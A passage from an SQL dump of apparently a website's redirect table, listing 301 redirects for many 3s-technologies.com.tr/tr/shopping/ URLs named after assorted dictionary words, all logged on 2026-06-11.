03:17:30','0000-00-00 00:00:00',301),(71315,'https://3s-technologies.com.tr/tr/shopping/toady/1134293183.html',NULL,'https://3s-technologies.com.tr/shopping/toady/1134293183.html','',1,0,'2026-06-11 03:17:33','0000-00-00 00:00:00',301),(71316,'https://3s-technologies.com.tr/tr/shopping/prisoned/1931748116.html',NULL,'https://3s-technologies.com.tr/shopping/prisoned/1931748116.html','',1,0,'2026-06-11 03:17:39','0000-00-00 00:00:00',301),(71317,'https://3s-technologies.com.tr/tr/shopping/parted/1033939575.html',NULL,'https://3s-technologies.com.tr/shopping/parted/1033939575.html','',1,0,'2026-06-11 03:17:42','0000-00-00 00:00:00',301),(71318,'https://3s-technologies.com.tr/tr/shopping/lactis/2018048382.html',NULL,'https://3s-technologies.com.tr/shopping/lactis/2018048382.html','',1,0,'2026-06-11 03:17:45','0000-00-00 00:00:00',301),(71319,'https://3s-technologies.com.tr/tr/shopping/pyrexia/1989580588.html',NULL,'https://3s-technologies.com.tr/shopping/pyrexia/1989580588.html','',1,0,'2026-06-11 03:17:48','0000-00-00 00:00:00',301),(71320,'https://3s-technologies.com.tr/tr/shopping/nauseant/2519219796.html',NULL,'https://3s-technologies.com.tr/shopping/nauseant/2519219796.html','',1,0,'2026-06-11 03:17:51','0000-00-00 00:00:00',301),(71321,'https://3s-technologies.com.tr/tr/shopping/amplifying/1631714703.html',NULL,'https://3s-technologies.com.tr/shopping/amplifying/1631714703.html','',1,0,'2026-06-11 03:17:54','0000-00-00 00:00:00',301),(71322,'https://3s-technologies.com.tr/tr/shopping/lighty/1275017763.html',NULL,'https://3s-technologies.com.tr/shopping/lighty/1275017763.html','',1,0,'2026-06-11 03:17:57','0000-00-00 00:00:00',301),(71323,'https://3s-technologies.com.tr/tr/shopping/subrector/2490082361.html',NULL,'https://3s-technologies.com.tr/shopping/subrector/2490082361.html','',1,0,'2026-06-11 03:18:00','0000-00-00 00:00:00',301),(71324,'https://3s-technologies.com.tr/tr/shopping/hypochondriums/3250771209.html',NULL,'https://3s-technologies.com.tr/shopping/hypochondriums/3250771209.html','',1,0,'2026-06-11 03:18:03','0000-00-00 00:00:00',301),(71325,'https://3s-technologies.com.tr/tr/shopping/trisulphide/2883902894.html',NULL,'https://3s-technologies.com.tr/shopping/trisulphide/2883902894.html','',1,0,'2026-06-11 03:18:10','0000-00-00 00:00:00',301),(71326,'https://3s-technologies.com.tr/tr/shopping/trapholes/1050544290.html',NULL,'https://3s-technologies.com.tr/shopping/trapholes/1050544290.html','',1,0,'2026-06-11 03:18:13','0000-00-00 00:00:00',301),(71327,'https://3s-technologies.com.tr/tr/shopping/obtested/3257804528.html',NULL,'https://3s-technologies.com.tr/shopping/obtested/3257804528.html','',1,0,'2026-06-11 03:18:16','0000-00-00 00:00:00',301),(71328,'https://3s-technologies.com.tr/tr/shopping/shady/3977138292.html',NULL,'https://3s-technologies.com.tr/shopping/shady/3977138292.html','',1,0,'2026-06-11 03:18:19','0000-00-00 00:00:00',301),(71329,'https://3s-technologies.com.tr/tr/shopping/denied/2192052020.html',NULL,'https://3s-technologies.com.tr/shopping/denied/2192052020.html','',1,0,'2026-06-11 03:18:22','0000-00-00 00:00:00',301),(71330,'https://3s-technologies.com.tr/tr/shopping/equitation/1976063967.html',NULL,'https://3s-technologies.com.tr/shopping/equitation/1976063967.html','',1,0,'2026-06-11 03:18:25','0000-00-00 00:00:00',301),(71331,'https://3s-technologies.com.tr/tr/shopping/inexpectation/5433767.html',NULL,'https://3s-technologies.com.tr/shopping/inexpectation/5433767.html','',1,0,'2026-06-11 03:18:28','0000-00-00 00:00:00',301),(71332,'https://3s-technologies.com.tr/tr/shopping/enterobius/1059885389.html',NULL,'https://3s-technologies.com.tr/shopping/enterobius/1059885389.html','',1,0,'2026-06-11 03:18:31','0000-00-00 00:00:00',301),(71333,'https://3s-technologies.com.tr/tr/shopping/polypoid/2757023831.html',NULL,'https://3s-technologies.com.tr/shopping/polypoid/2757023831.html','',1,0,'2026-06-11 03:18:34','0000-00-00 00:00:00',301),(71334,'https://3s-technologies.com.tr/tr/shopping/papyri/1346176829.html',NULL,'https://3s-technologies.com.tr/shopping/papyri/1346176829.html','',1,0,'2026-06-11 03:18:43','0000-00-00 00:00:00',301),(71335,'https://3s-technologies.com.tr/tr/shopping/disaffectedness/796429471.html',NULL,'https://3s-technologies.com.tr/shopping/disaffectedness/796429471.html','',1,0,'2026-06-11 03:18:47','0000-00-00 00:00:00',301),(71336,'https://3s-technologies.com.tr/tr/shopping/fervour/591677332.html',NULL,'https://3s-technologies.com.tr/shopping/fervour/591677332.html','',1,0,'2026-06-11 03:18:50','0000-00-00 00:00:00',301),(71337,'https://3s-technologies.com.tr/tr/shopping/indictee/2384577524.html',NULL,'https://3s-technologies.com.tr/shopping/indictee/2384577524.html','',1,0,'2026-06-11 03:18:53','0000-00-00 00:00:00',301),(71338,'https://3s-technologies.com.tr/tr/shopping/refitment/3221019572.html',NULL,'https://3s-technologies.com.tr/shopping/refitment/3221019572.html','',1,0,'2026-06-11 03:18:56','0000-00-00 00:00:00',301),(71339,'https://3s-technologies.com.tr/tr/shopping/trichosurus/1340392387.html',NULL,'https://3s-technologies.com.tr/shopping/trichosurus/1340392387.html','',1,0,'2026-06-11 03:18:59','0000-00-00 00:00:00',301),(71340,'https://3s-technologies.com.tr/tr/shopping/godliness/1032958575.html',NULL,'https://3s-technologies.com.tr/shopping/godliness/1032958575.html','',1,0,'2026-06-11 03:19:02','0000-00-00 00:00:00',301),(71341,'https://3s-technologies.com.tr/tr/shopping/djinnee/927435868.html',NULL,'https://3s-technologies.com.tr/shopping/djinnee/927435868.html','',1,0,'2026-06-11 03:19:05','0000-00-00 00:00:00',301),(71342,'https://3s-technologies.com.tr/tr/shopping/suborn/4189966862.html',NULL,'https://3s-technologies.com.tr/shopping/suborn/4189966862.html','',1,0,'2026-06-11 03:19:08','0000-00-00 00:00:00',301),(71343,'https://3s-technologies.com.tr/tr/shopping/nonmodern/397354133.html',NULL,'https://3s-technologies.com.tr/shopping/nonmodern/397354133.html','',1,0,'2026-06-11 03:19:12','0000-00-00 00:00:00',301),(71344,'https://3s-technologies.com.tr/tr/shopping/concretionary/1844826909.html',NULL,'https://3s-technologies.com.tr/shopping/concretionary/1844826909.html','',1,0,'2026-06-11 03:19:14','0000-00-00 00:00:00',301),(71345,'https://3s-technologies.com.tr/tr/shopping/curbless/2027851209.html',NULL,'https://3s-technologies.com.tr/shopping/curbless/2027851209.html','',1,0,'2026-06-11 03:19:17','0000-00-00 00:00:00',301),(71346,'https://3s-technologies.com.tr/tr/shopping/wheyey/1695860144.html',NULL,'https://3s-technologies.com.tr/shopping/wheyey/1695860144.html','',1,0,'2026-06-11 03:19:20','0000-00-00 00:00:00',301),(71347,'https://3s-technologies.com.tr/tr/shopping/eremicus/3359690922.html',NULL,'https://3s-technologies.com.tr/shopping/eremicus/3359690922.html','',1,0,'2026-06-11 03:19:23','0000-00-00 00:00:00',301),(71348,'https://3s-technologies.com.tr/tr/shopping/abrade/2220747057.html',NULL,'https://3s-technologies.com.tr/shopping/abrade/2220747057.html','',1,0,'2026-06-11 03:19:26','0000-00-00 00:00:00',301),(71349,'https://3s-technologies.com.tr/tr/shopping/cogitative/1037778008.html',NULL,'https://3s-technologies.com.tr/shopping/cogitative/1037778008.html','',1,0,'2026-06-11 03:19:29','0000-00-00 00:00:00',301),(71350,'https://3s-technologies.com.tr/tr/shopping/ballade/1589524598.html',NULL,'https://3s-technologies.com.tr/shopping/ballade/1589524598.html','',1,0,'2026-06-11 03:19:32','0000-00-00 00:00:00',301),(71351,'https://3s-technologies.com.tr/tr/shopping/hostaceae/1122759317.html',NULL,'https://3s-technologies.com.tr/shopping/hostaceae/1122759317.html','',1,0,'2026-06-11 03:19:35','0000-00-00 00:00:00',301),(71352,'https://3s-technologies.com.tr/tr/shopping/constituencies/492323642.html',NULL,'https://3s-technologies.com.tr/shopping/constituencies/492323642.html','',1,0,'2026-06-11 03:19:41','0000-00-00 00:00:00',301),(71353,'https://3s-technologies.com.tr/tr/shopping/understrapping/2433400589.html',NULL,'https://3s-technologies.com.tr/shopping/understrapping/2433400589.html','',1,0,'2026-06-11 03:19:46','0000-00-00 00:00:00',301),(71354,'https://3s-technologies.com.tr/tr/shopping/segetum/2833457333.html',NULL,'https://3s-technologies.com.tr/shopping/segetum/2833457333.html','',1,0,'2026-06-11 03:19:49','0000-00-00 00:00:00',301),(71355,'https://3s-technologies.com.tr/tr/shopping/inconsiderately/1610630630.html',NULL,'https://3s-technologies.com.tr/shopping/inconsiderately/1610630630.html','',1,0,'2026-06-11 03:19:52','0000-00-00 00:00:00',301),(71356,'https://3s-technologies.com.tr/tr/shopping/steaning/2577547905.html',NULL,'https://3s-technologies.com.tr/shopping/steaning/2577547905.html','',1,0,'2026-06-11 03:19:55','0000-00-00 00:00:00',301),(71357,'https://3s-technologies.com.tr/tr/shopping/transship/2207357181.html',NULL,'https://3s-technologies.com.tr/shopping/transship/2207357181.html','',1,0,'2026-06-11 03:19:58','0000-00-00 00:00:00',301),(71358,'https://3s-technologies.com.tr/tr/shopping/tullibee/3256361752.html',NULL,'https://3s-technologies.com.tr/shopping/tullibee/3256361752.html','',1,0,'2026-06-11 03:20:01','0000-00-00 00:00:00',301),(71359,'https://3s-technologies.com.tr/tr/shopping/cerated/4239720672.html',NULL,'https://3s-technologies.com.tr/shopping/cerated/4239720672.html','',1,0,'2026-06-11 03:20:04','0000-00-00 00:00:00',301),(71360,'https://3s-technologies.com.tr/tr/shopping/eradication/1314072738.html',NULL,'https://3s-technologies.com.tr/shopping/eradication/1314072738.html','',1,0,'2026-06-11 03:20:07','0000-00-00 00:00:00',301),(71361,'https://3s-technologies.com.tr/tr/shopping/stolidity/895987752.html',NULL,'https://3s-technologies.com.tr/shopping/stolidity/895987752.html','',1,0,'2026-06-11 03:20:12','0000-00-00 00:00:00',301),(71362,'https://3s-technologies.com.tr/tr/shopping/exacuate/268659040.html',NULL,'https://3s-technologies.com.tr/shopping/exacuate/268659040.html','',1,0,'2026-06-11 03:20:14','0000-00-00 00:00:00',301),(71363,'https://3s-technologies.com.tr/tr/shopping/dextroglucose/1308044378.html',NULL,'https://3s-technologies.com.tr/shopping/dextroglucose/1308044378.html','',1,0,'2026-06-11 03:20:17','0000-00-00 00:00:00',301),(71364,'https://3s-technologies.com.tr/tr/shopping/ovant/37425082.html',NULL,'https://3s-technologies.com.tr/shopping/ovant/37425082.html','',1,0,'2026-06-11 03:20:34','0000-00-00 00:00:00',301),(71365,'https://3s-technologies.com.tr/tr/shopping/vipera/1445551052.html',NULL,'https://3s-technologies.com.tr/shopping/vipera/1445551052.html','',1,0,'2026-06-11 03:20:36','0000-00-00 00:00:00',301),(71366,'https://3s-technologies.com.tr/tr/shopping/missound/3950867485.html',NULL,'https://3s-technologies.com.tr/shopping/missound/3950867485.html','',1,0,'2026-06-11 03:20:39','0000-00-00 00:00:00',301),(71367,'https://3s-technologies.com.tr/tr/shopping/mitrewort/165760162.html',NULL,'https://3s-technologies.com.tr/shopping/mitrewort/165760162.html','',1,0,'2026-06-11 03:20:42','0000-00-00 00:00:00',301),(71368,'https://3s-technologies.com.tr/tr/shopping/philetaerus/718016384.html',NULL,'https://3s-technologies.com.tr/shopping/philetaerus/718016384.html','',1,0,'2026-06-11 03:20:45','0000-00-00 00:00:00',301),(71369,'https://3s-technologies.com.tr/tr/shopping/carmelite/3281238673.html',NULL,'https://3s-technologies.com.tr/shopping/carmelite/3281238673.html','',1,0,'2026-06-11 03:20:48','0000-00-00 00:00:00',301),(71370,'https://3s-technologies.com.tr/tr/shopping/yachtsmen/982324751.html',NULL,'https://3s-technologies.com.tr/shopping/yachtsmen/982324751.html','',1,0,'2026-06-11 03:20:51','0000-00-00 00:00:00',301),(71371,'https://3s-technologies.com.tr/tr/shopping/uralian/2409290906.html',NULL,'https://3s-technologies.com.tr/shopping/uralian/2409290906.html','',1,0,'2026-06-11 03:20:54','0000-00-00 00:00:00',301),(71372,'https://3s-technologies.com.tr/tr/shopping/staghound/3523357882.html',NULL,'https://3s-technologies.com.tr/shopping/staghound/3523357882.html','',1,0,'2026-06-11 03:20:57','0000-00-00 00:00:00',301),(71373,'https://3s-technologies.com.tr/tr/shopping/hebridean/3972695595.html',NULL,'https://3s-technologies.com.tr/shopping/hebridean/3972695595.html','',1,0,'2026-06-11 03:21:02','0000-00-00 00:00:00',301),(71374,'https://3s-technologies.com.tr/tr/shopping/passion/931206725.html',NULL,'https://3s-technologies.com.tr/shopping/passion/931206725.html','',1,0,'2026-06-11 03:21:05','0000-00-00 00:00:00',301),(71375,'https://3s-technologies.com.tr/tr/shopping/redbird/910918624.html',NULL,'https://3s-technologies.com.tr/shopping/redbird/910918624.html','',1,0,'2026-06-11 03:21:08','0000-00-00 00:00:00',301),(71376,'https://3s-technologies.com.tr/tr/shopping/allow/1566205150.html',NULL,'https://3s-technologies.com.tr/shopping/allow/1566205150.html','',1,0,'2026-06-11 03:21:11','0000-00-00 00:00:00',301),(71377,'https://3s-technologies.com.tr/tr/shopping/dichotomously/1314303383.html',NULL,'https://3s-technologies.com.tr/shopping/dichotomously/1314303383.html','',1,0,'2026-06-11 03:21:14','0000-00-00 00:00:00',301),(71378,'https://3s-technologies.com.tr/tr/shopping/adenalgia/2709839042.html',NULL,'https://3s-technologies.com.tr/shopping/adenalgia/2709839042.html','',1,0,'2026-06-11 03:21:17','0000-00-00 00:00:00',301),(71379,'https://3s-technologies.com.tr/tr/shopping/onguent/3328895015.html',NULL,'https://3s-technologies.com.tr/shopping/onguent/3328895015.html','',1,0,'2026-06-11 03:21:20','0000-00-00 00:00:00',301),(71380,'https://3s-technologies.com.tr/tr/shopping/patriarch/13253185.html',NULL,'https://3s-technologies.com.tr/shopping/patriarch/13253185.html','',1,0,'2026-06-11 03:21:23','0000-00-00 00:00:00',301),(71381,'https://3s-technologies.com.tr/tr/shopping/plage/1417267316.html',NULL,'https://3s-technologies.com.tr/shopping/plage/1417267316.html','',1,0,'2026-06-11 03:21:26','0000-00-00 00:00:00',301),(71382,'https://3s-technologies.com.tr/tr/shopping/lowii/2729540925.html',NULL,'https://3s-technologies.com.tr/shopping/lowii/2729540925.html','',1,0,'2026-06-11 03:21:31','0000-00-00 00:00:00',301),(71383,'https://3s-technologies.com.tr/tr/shopping/privily/132686116.html',NULL,'https://3s-technologies.com.tr/shopping/privily/132686116.html','',1,0,'2026-06-11 03:21:35','0000-00-00 00:00:00',301),(71384,'https://3s-technologies.com.tr/tr/shopping/steedless/3507282081.html',NULL,'https://3s-technologies.com.tr/shopping/steedless/3507282081.html','',1,0,'2026-06-11 03:21:38','0000-00-00 00:00:00',301),(71385,'https://3s-technologies.com.tr/tr/shopping/enoptomancy/224115413.html',NULL,'https://3s-technologies.com.tr/shopping/enoptomancy/224115413.html','',1,0,'2026-06-11 03:21:41','0000-00-00 00:00:00',301),(71386,'https://3s-technologies.com.tr/tr/shopping/chirrup/2712022348.html',NULL,'https://3s-technologies.com.tr/shopping/chirrup/2712022348.html','',1,0,'2026-06-11 03:21:44','0000-00-00 00:00:00',301),(71387,'https://3s-technologies.com.tr/tr/shopping/begrease/1852840864.html',NULL,'https://3s-technologies.com.tr/shopping/begrease/1852840864.html','',1,0,'2026-06-11 03:21:47','0000-00-00 00:00:00',301),(71388,'https://3s-technologies.com.tr/tr/shopping/callousness/2207587842.html',NULL,'https://3s-technologies.com.tr/shopping/callousness/2207587842.html','',1,0,'2026-06-11 03:21:50','0000-00-00 00:00:00',301),(71389,'https://3s-technologies.com.tr/tr/shopping/phytolacca/3863565538.html',NULL,'https://3s-technologies.com.tr/shopping/phytolacca/3863565538.html','',1,0,'2026-06-11 03:21:53','0000-00-00 00:00:00',301),(71390,'https://3s-technologies.com.tr/tr/shopping/marbly/2150362928.html',NULL,'https://3s-technologies.com.tr/shopping/marbly/2150362928.html','',1,0,'2026-06-11 03:21:56','0000-00-00 00:00:00',301),(71391,'https://3s-technologies.com.tr/tr/shopping/developed/639333690.html',NULL,'https://3s-technologies.com.tr/shopping/developed/639333690.html','',1,0,'2026-06-11 03:22:03','0000-00-00 00:00:00',301),(71392,'https://3s-technologies.com.tr/tr/shopping/spearer/2668388697.html',NULL,'https://3s-technologies.com.tr/shopping/spearer/2668388697.html','',1,0,'2026-06-11 03:22:06','0000-00-00 00:00:00',301),(71393,'https://3s-technologies.com.tr/tr/shopping/twohand/3499316604.html',NULL,'https://3s-technologies.com.tr/shopping/twohand/3499316604.html','',1,0,'2026-06-11 03:22:09','0000-00-00 00:00:00',301),(71394,'https://3s-technologies.com.tr/tr/shopping/illfamed/2706057938.html',NULL,'https://3s-technologies.com.tr/shopping/illfamed/2706057938.html','',1,0,'2026-06-11 03:22:25','0000-00-00 00:00:00',301),(71395,'https://3s-technologies.com.tr/tr/shopping/seacoal/1878929868.html',NULL,'https://3s-technologies.com.tr/shopping/seacoal/1878929868.html','',1,0,'2026-06-11 03:22:27','0000-00-00 00:00:00',301),(71396,'https://3s-technologies.com.tr/tr/shopping/criminously/3934659459.html',NULL,'https://3s-technologies.com.tr/shopping/criminously/3934659459.html','',1,0,'2026-06-11 03:22:30','0000-00-00 00:00:00',301),(71397,'https://3s-technologies.com.tr/tr/shopping/mesosternal/3599267834.html',NULL,'https://3s-technologies.com.tr/shopping/mesosternal/3599267834.html','',1,0,'2026-06-11 03:22:33','0000-00-00 00:00:00',301),(71398,'https://3s-technologies.com.tr/tr/shopping/bitchy/1643941744.html',NULL,'https://3s-technologies.com.tr/shopping/bitchy/1643941744.html','',1,0,'2026-06-11 03:22:36','0000-00-00 00:00:00',301),(71399,'https://3s-technologies.com.tr/tr/shopping/achilles/1837650400.html',NULL,'https://3s-technologies.com.tr/shopping/achilles/1837650400.html','',1,0,'2026-06-11 03:22:39','0000-00-00 00:00:00',301),(71400,'https://3s-technologies.com.tr/tr/shopping/ominousness/2187299725.html',NULL,'https://3s-technologies.com.tr/shopping/ominousness/2187299725.html','',1,0,'2026-06-11 03:22:42','0000-00-00 00:00:00',301),(71401,'https://3s-technologies.com.tr/tr/shopping/unfed/1150242255.html',NULL,'https://3s-technologies.com.tr/shopping/unfed/1150242255.html','',1,0,'2026-06-11 03:22:45','0000-00-00 00:00:00',301),(71402,'https://3s-technologies.com.tr/tr/shopping/sultrier/2171156770.html',NULL,'https://3s-technologies.com.tr/shopping/sultrier/2171156770.html','',1,0,'2026-06-11 03:22:48','0000-00-00 00:00:00',301),(71403,'https://3s-technologies.com.tr/tr/shopping/unbid/3335665857.html',NULL,'https://3s-technologies.com.tr/shopping/unbid/3335665857.html','',1,0,'2026-06-11 03:23:16','0000-00-00 00:00:00',301),(71404,'https://3s-technologies.com.tr/tr/shopping/beggestere/890023358.html',NULL,'https://3s-technologies.com.tr/shopping/beggestere/890023358.html','',1,0,'2026-06-11 03:23:20','0000-00-00 00:00:00',301),(71405,'https://3s-technologies.com.tr/tr/shopping/sandemanianism/3753889411.html',NULL,'https://3s-technologies.com.tr/shopping/sandemanianism/3753889411.html','',1,0,'2026-06-11 03:23:23','0000-00-00 00:00:00',301),(71406,'https://3s-technologies.com.tr/tr/shopping/gracilariid/896806451.html',NULL,'https://3s-technologies.com.tr/shopping/gracilariid/896806451.html','',1,0,'2026-06-11 03:23:26','0000-00-00 00:00:00',301),(71407,'https://3s-technologies.com.tr/tr/shopping/importunate/1783521551.html',NULL,'https://3s-technologies.com.tr/shopping/importunate/1783521551.html','',1,0,'2026-06-11 03:23:29','0000-00-00 00:00:00',301),(71408,'https://3s-technologies.com.tr/tr/shopping/sivatherium/4150540535.html',NULL,'https://3s-technologies.com.tr/shopping/sivatherium/4150540535.html','',1,0,'2026-06-11 03:23:32','0000-00-00 00:00:00',301),(71409,'https://3s-technologies.com.tr/tr/shopping/fellies/1424414894.html',NULL,'https://3s-technologies.com.tr/shopping/fellies/1424414894.html','',1,0,'2026-06-11 03:23:35','0000-00-00 00:00:00',301),(71410,'https://3s-technologies.com.tr/tr/shopping/incorporative/2483154399.html',NULL,'https://3s-technologies.com.tr/shopping/incorporative/2483154399.html','',1,0,'2026-06-11 03:23:38','0000-00-00 00:00:00',301),(71411,'https://3s-technologies.com.tr/tr/shopping/spongiose/1146865566.html',NULL,'https://3s-technologies.com.tr/shopping/spongiose/1146865566.html','',1,0,'2026-06-11 03:23:41','0000-00-00 00:00:00',301),(71412,'https://3s-technologies.com.tr/tr/shopping/aleboof/607526800.html',NULL,'https://3s-technologies.com.tr/shopping/aleboof/607526800.html','',1,0,'2026-06-11 03:23:49','0000-00-00 00:00:00',301),(71413,'https://3s-technologies.com.tr/tr/shopping/cruzado/2559690417.html',NULL,'https://3s-technologies.com.tr/shopping/cruzado/2559690417.html','',1,0,'2026-06-11 03:23:53','0000-00-00 00:00:00',301),(71414,'https://3s-technologies.com.tr/tr/shopping/uncontrovertible/3584208849.html',NULL,'https://3s-technologies.com.tr/shopping/uncontrovertible/3584208849.html','',1,0,'2026-06-11 03:23:55','0000-00-00 00:00:00',301),(71415,'https://3s-technologies.com.tr/tr/shopping/mulita/328463614.html',NULL,'https://3s-technologies.com.tr/shopping/mulita/328463614.html','',1,0,'2026-06-11 03:23:59','0000-00-00 00:00:00',301),(71416,'https://3s-technologies.com.tr/tr/shopping/metallurgic/2769613490.html',NULL,'https://3s-technologies.com.tr/shopping/metallurgic/2769613490.html','',1,0,'2026-06-11 03:24:02','0000-00-00 00:00:00',301),(71417,'https://3s-technologies.com.tr/tr/shopping/receptary/2055535247.html',NULL,'https://3s-technologies.com.tr/shopping/receptary/2055535247.html','',1,0,'2026-06-11 03:24:05','0000-00-00 00:00:00',301),(71418,'https://3s-technologies.com.tr/tr/shopping/swabbing/1870182818.html',NULL,'https://3s-technologies.com.tr/shopping/swabbing/1870182818.html','',1,0,'2026-06-11 03:24:08','0000-00-00 00:00:00',301),(71419,'https://3s-technologies.com.tr/tr/shopping/spartina/1281120855.html',NULL,'https://3s-technologies.com.tr/shopping/spartina/1281120855.html','',1,0,'2026-06-11 03:24:11','0000-00-00 00:00:00',301),(71420,'https://3s-technologies.com.tr/tr/shopping/coinquination/1155975988.html',NULL,'https://3s-technologies.com.tr/shopping/coinquination/1155975988.html','',1,0,'2026-06-11 03:24:14','0000-00-00 00:00:00',301),(71421,'https://3s-technologies.com.tr/tr/shopping/aftershafted/1588184370.html',NULL,'https://3s-technologies.com.tr/shopping/aftershafted/1588184370.html','',1,0,'2026-06-11 03:24:19','0000-00-00 00:00:00',301),(71422,'https://3s-technologies.com.tr/tr/shopping/anglocatholicism/2224159108.html',NULL,'https://3s-technologies.com.tr/shopping/anglocatholicism/2224159108.html','',1,0,'2026-06-11 03:24:22','0000-00-00 00:00:00',301),(71423,'https://3s-technologies.com.tr/tr/shopping/amandine/3285929961.html',NULL,'https://3s-technologies.com.tr/shopping/amandine/3285929961.html','',1,0,'2026-06-11 03:24:25','0000-00-00 00:00:00',301),(71424,'https://3s-technologies.com.tr/tr/shopping/carambucidae/2191923875.html',NULL,'https://3s-technologies.com.tr/shopping/carambucidae/2191923875.html','',1,0,'2026-06-11 03:24:28','0000-00-00 00:00:00',301),(71425,'https://3s-technologies.com.tr/tr/shopping/cylindrostachya/2091406761.html',NULL,'https://3s-technologies.com.tr/shopping/cylindrostachya/2091406761.html','',1,0,'2026-06-11 03:24:31','0000-00-00 00:00:00',301),(71426,'https://3s-technologies.com.tr/tr/shopping/quincewort/2123085538.html',NULL,'https://3s-technologies.com.tr/shopping/quincewort/2123085538.html','',1,0,'2026-06-11 03:24:34','0000-00-00 00:00:00',301),(71427,'https://3s-technologies.com.tr/tr/shopping/indigestible/1272550444.html',NULL,'https://3s-technologies.com.tr/shopping/indigestible/1272550444.html','',1,0,'2026-06-11 03:24:37','0000-00-00 00:00:00',301),(71428,'https://3s-technologies.com.tr/tr/shopping/hyposulphuric/2269767772.html',NULL,'https://3s-technologies.com.tr/shopping/hyposulphuric/2269767772.html','',1,0,'2026-06-11 03:24:40','0000-00-00 00:00:00',301),(71429,'https://3s-technologies.com.tr/tr/shopping/consolatory/1004100031.html',NULL,'https://3s-technologies.com.tr/shopping/consolatory/1004100031.html','',1,0,'2026-06-11 03:24:48','0000-00-00 00:00:00',301),(71430,'https://3s-technologies.com.tr/tr/shopping/banging/3019085831.html',NULL,'https://3s-technologies.com.tr/shopping/banging/3019085831.html','',1,0,'2026-06-11 03:24:50','0000-00-00 00:00:00',301),(71431,'https://3s-technologies.com.tr/tr/shopping/electrodynamical/2547704473.html',NULL,'https://3s-technologies.com.tr/shopping/electrodynamical/2547704473.html','',1,0,'2026-06-11 03:24:56','0000-00-00 00:00:00',301),(71432,'https://3s-technologies.com.tr/tr/shopping/abbreviation/3065886261.html',NULL,'https://3s-technologies.com.tr/shopping/abbreviation/3065886261.html','',1,0,'2026-06-11 03:25:00','0000-00-00 00:00:00',301),(71433,'https://3s-technologies.com.tr/tr/shopping/pipped/260084741.html',NULL,'https://3s-technologies.com.tr/shopping/pipped/260084741.html','',1,0,'2026-06-11 03:25:07','0000-00-00 00:00:00',301),(71434,'https://3s-technologies.com.tr/tr/shopping/forestay/1986090714.html',NULL,'https://3s-technologies.com.tr/shopping/forestay/1986090714.html','',1,0,'2026-06-11 03:25:09','0000-00-00 00:00:00',301),(71435,'https://3s-technologies.com.tr/tr/shopping/paraphrasing/3208792531.html',NULL,'https://3s-technologies.com.tr/shopping/paraphrasing/3208792531.html','',1,0,'2026-06-11 03:25:49','0000-00-00 00:00:00',301),(71436,'https://3s-technologies.com.tr/tr/shopping/melasma/835219000.html',NULL,'https://3s-technologies.com.tr/shopping/melasma/835219000.html','',1,0,'2026-06-11 03:25:52','0000-00-00 00:00:00',301),(71437,'https://3s-technologies.com.tr/tr/shopping/middlingness/1310532526.html',NULL,'https://3s-technologies.com.tr/shopping/middlingness/1310532526.html','',1,0,'2026-06-11 03:26:01','0000-00-00 00:00:00',301),(71438,'https://3s-technologies.com.tr/tr/shopping/raver/907541935.html',NULL,'https://3s-technologies.com.tr/shopping/raver/907541935.html','',1,0,'2026-06-11 03:26:04','0000-00-00 00:00:00',301),(71439,'https://3s-technologies.com.tr/tr/shopping/calculating/1955939373.html',NULL,'https://3s-technologies.com.tr/shopping/calculating/1955939373.html','',1,0,'2026-06-11 03:26:38','0000-00-00 00:00:00',301),(71440,'https://3s-technologies.com.tr/tr/shopping/infraposition/791677144.html',NULL,'https://3s-technologies.com.tr/shopping/infraposition/791677144.html','',1,0,'2026-06-11 03:26:42','0000-00-00 00:00:00',301),(71441,'https://3s-technologies.com.tr/tr/shopping/minos/3249705565.html',NULL,'https://3s-technologies.com.tr/shopping/minos/3249705565.html','',1,0,'2026-06-11 03:27:08','0000-00-00 00:00:00',301),(71442,'https://3s-technologies.com.tr/tr/shopping/henogenesis/2435824771.html',NULL,'https://3s-technologies.com.tr/shopping/henogenesis/2435824771.html','',1,0,'2026-06-11 03:27:11','0000-00-00 00:00:00',301),(71443,'https://3s-technologies.com.tr/tr/shopping/henpecking/2749040252.html',NULL,'https://3s-technologies.com.tr/shopping/henpecking/2749040252.html','',1,0,'2026-06-11 03:27:15','0000-00-00 00:00:00',301),(71444,'https://3s-technologies.com.tr/tr/shopping/discriminant/3101896239.html',NULL,'https://3s-technologies.com.tr/shopping/discriminant/3101896239.html','',1,0,'2026-06-11 03:27:17','0000-00-00 00:00:00',301),(71445,'https://3s-technologies.com.tr/tr/shopping/jugulate/2002675096.html',NULL,'https://3s-technologies.com.tr/shopping/jugulate/2002675096.html','',1,0,'2026-06-11 03:27:49','0000-00-00 00:00:00',301),(71446,'https://3s-technologies.com.tr/tr/shopping/arraign/689071055.html',NULL,'https://3s-technologies.com.tr/shopping/arraign/689071055.html','',1,0,'2026-06-11 03:27:52','0000-00-00 00:00:00',301),(71447,'https://3s-technologies.com.tr/tr/shopping/mesua/734910364.html',NULL,'https://3s-technologies.com.tr/shopping/mesua/734910364.html','',1,0,'2026-06-11 03:27:57','0000-00-00 00:00:00',301),(71448,'https://3s-technologies.com.tr/tr/shopping/nugacity/1619932322.html',NULL,'https://3s-technologies.com.tr/shopping/nugacity/1619932322.html','',1,0,'2026-06-11 03:28:00','0000-00-00 00:00:00',301),(71449,'https://3s-technologies.com.tr/tr/shopping/macro/1782781351.html',NULL,'https://3s-technologies.com.tr/shopping/macro/1782781351.html','',1,0,'2026-06-11 03:28:38','0000-00-00 00:00:00',301),(71450,'https://3s-technologies.com.tr/tr/shopping/hypochondriac/4249060969.html',NULL,'https://3s-technologies.com.tr/shopping/hypochondriac/4249060969.html','',1,0,'2026-06-11 03:28:42','0000-00-00 00:00:00',301),(71451,'https://3s-technologies.com.tr/tr/shopping/nicene/18066547.html',NULL,'https://3s-technologies.com.tr/shopping/nicene/18066547.html','',1,0,'2026-06-11 03:28:52','0000-00-00 00:00:00',301),(71452,'https://3s-technologies.com.tr/tr/shopping/transposable/2403355037.html',NULL,'https://3s-technologies.com.tr/shopping/transposable/2403355037.html','',1,0,'2026-06-11 03:28:54','0000-00-00 00:00:00',301),(71453,'https://3s-technologies.com.tr/tr/shopping/chaplaincies/1700363908.html',NULL,'https://3s-technologies.com.tr/shopping/chaplaincies/1700363908.html','',1,0,'2026-06-11 03:29:44','0000-00-00 00:00:00',301),(71454,'https://3s-technologies.com.tr/tr/shopping/irroration/4147061406.html',NULL,'https://3s-technologies.com.tr/shopping/irroration/4147061406.html','',1,0,'2026-06-11 03:29:46','0000-00-00 00:00:00',301),(71455,'https://3s-technologies.com.tr/tr/shopping/libethenite/2487743171.html',NULL,'https://3s-technologies.com.tr/shopping/libethenite/2487743171.html','',1,0,'2026-06-11 03:30:29','0000-00-00 